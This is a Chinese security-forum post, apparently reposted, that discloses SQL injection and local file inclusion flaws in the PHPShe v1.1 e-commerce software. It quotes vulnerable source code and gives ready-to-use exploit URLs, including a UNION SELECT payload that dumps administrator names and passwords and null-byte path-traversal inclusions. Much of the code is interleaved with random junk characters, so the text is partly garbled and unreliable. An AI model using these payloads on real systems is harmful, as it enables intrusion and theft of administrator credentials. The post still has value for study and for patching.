中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]

作者: admin 时间: 2013-4-16 16:45
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输

//common.php
if (get_magic_quotes_gpc()) {
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

0×01 包含漏洞

//首页文件
pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php"); //$mod可控造成“鸡肋”包含漏洞
pe_result();
?>
//common 文件第15行开始
url路由配置
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00

+ q4 V( s* r$ V% s, m( {8 d
1 }. u( p1 Q; Z5 F& Z0 x
0×02 搜索注入
2 J8 C7 f0 U, g% n ! {1 @) ~7 l) T* h; f- h+ {8 D/ z4 |4 c
<code id="code2">

//product.php文件
! S. k/ I/ Z" f' Zcase 'list':8 X: y3 j. ^0 y0 P% _: I+ G9 [5 v
$category_id = intval($id);
7 U: {! w  |9 v: s" g+ v; Q$info = $db->pe_select('category', array('category_id'=>$category_id));
' l' {! V; F, h//搜索
0 H" L6 H3 T& \; `$sqlwhere = " and `product_state` = 1";. C4 c) R" W6 Z; j
pe_lead('hook/category.hook.php');; p" [" t5 r* L1 H; s" [
if ($category_id) {
, X" w. ~0 D6 Zwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
, d9 H) B4 D, z" B7 t7 C7 j) I}, r5 Z; T, y3 q3 |# e
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤, i8 Z  U9 A% d- t9 Y& o
if ($_g_orderby) {- T7 A) [+ ]9 |' s
$orderby = explode('_', $_g_orderby);
: H( c0 X  z: |% r' c8 _8 |$ m7 B" k$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";7 U/ k) ?8 U0 _  {' z9 y
}
1 P; {9 n* [* |0 [- \else {
- u# A. S% y( C  M1 m0 H$sqlwhere .= " order by `product_id` desc";/ U9 x) A+ m+ o7 ?: T" l" N+ h
}
6 d- B0 Q1 J5 r, m0 e3 W* t4 A$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));% j& z0 J8 O8 b0 `+ m
//热卖排行
. d) {1 L$ ^. U+ D$product_hotlist = product_hotlist();
% Q8 l* d, F- y! k. e0 b//当前路径7 r" G" }. }2 Z% Z6 N
$nowpath = category_path($category_id);1 L/ M7 C0 \% q8 K( c
$seo = pe_seo($info['category_name']);0 ~7 H# F( n$ D( ^$ P, q/ @0 q
include(pe_tpl('product_list.html'));1 m' a$ u2 c/ W( W
//跟进selectall函数库1 Z4 T, w" j5 z8 r6 F3 ]
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())0 ]7 W1 R' }4 s" \. s
{
, n8 N$ m( @7 J4 T//处理条件语句1 A4 m. G2 P" d1 ]5 ~3 H& ]- M
$sqlwhere = $this->_dowhere($where);* F+ \5 H2 N2 }* w
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);5 K9 N/ J# ~2 Z3 ^: I- T+ T4 e
}# a3 T- I, Q4 V5 @* B8 u* A( p
//exp
0 E# I# `- f- p) b& ^product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
  W: e  x' q! U4 I- @3 c2 z" e

</code>
9 J F/ D% u g0 V! T
; G7 G" `3 {. O- {+ o, _ S9 c& x0×03 包含漏洞2) h. H+ U8 \' M5 t7 o$ f

4 _# }; A- o, f# o<code id="code3">

//order.php

case 'pay':

( v$ W; R* `( A( Y" l; W N
$order_id = pe_dbhold($_g_id);

0 P, Y8 e9 c# @+ N2 S$cache_payway = cache::get('payway');

4 `0 r- D- H% s1 o% w' B
foreach($cache_payway as $k => $v) {

* I+ @. r5 e! X, K$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

& V3 z$ _( h- j* j/ n8 [if ($k == 'bank') {

( O, h9 Y( ^# Z$ U L! y
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

4 w1 c8 I P% ]" ?5 x}

/ M) V4 S+ U l8 @# @}

7 a( B( x1 H+ L
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

7 ]6 @. l0 _" V: C3 j
!$order['order_id'] && pe_error('订单号错误...');

( c. y5 J4 J. t, S
if (isset($_p_pesubmit)) {

# I6 X( p' @0 L4 n6 }+ R
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

5 p9 D7 p: q& u7 H2 y0 j. |7 r$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

: e3 w7 ^& ]- j4 L7 U8 Sforeach ($info_list as $v) {

) h7 }$ m( E R( }7 N# b( o2 H% Z
$order['order_name'] .= "{$v['product_name']};";! l+ Q- s- k& @

, Y# R. M* @$ x; H}

* P. ^* c8 o) X/ p6 W: N3 h; o! |
echo '正在为您连接支付网站，请稍后...';

' V$ {, ^9 f8 P" A- k
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

; b2 ^* ~1 q- k$ g1 U. V}//当一切准备好的时候就可以进行"鸡肋包含了"

: _# T) y% u7 g) W& G3 T% B" s ^else {

2 [$ X% d' }+ y* ]$ O' f o
pe_error('支付错误...');

; _: L! S l0 [: P o}

1 ~* k" @& q- g/ X}

5 |( y) B# W# f7 `' x
$seo = pe_seo('选择支付方式');

" T8 A, S1 l% {9 Z* Qinclude(pe_tpl('order_pay.html'));

) _0 k3 O: h- I( k3 Cbreak;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>' U5 _# k# l! l5 Q1 v: d
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)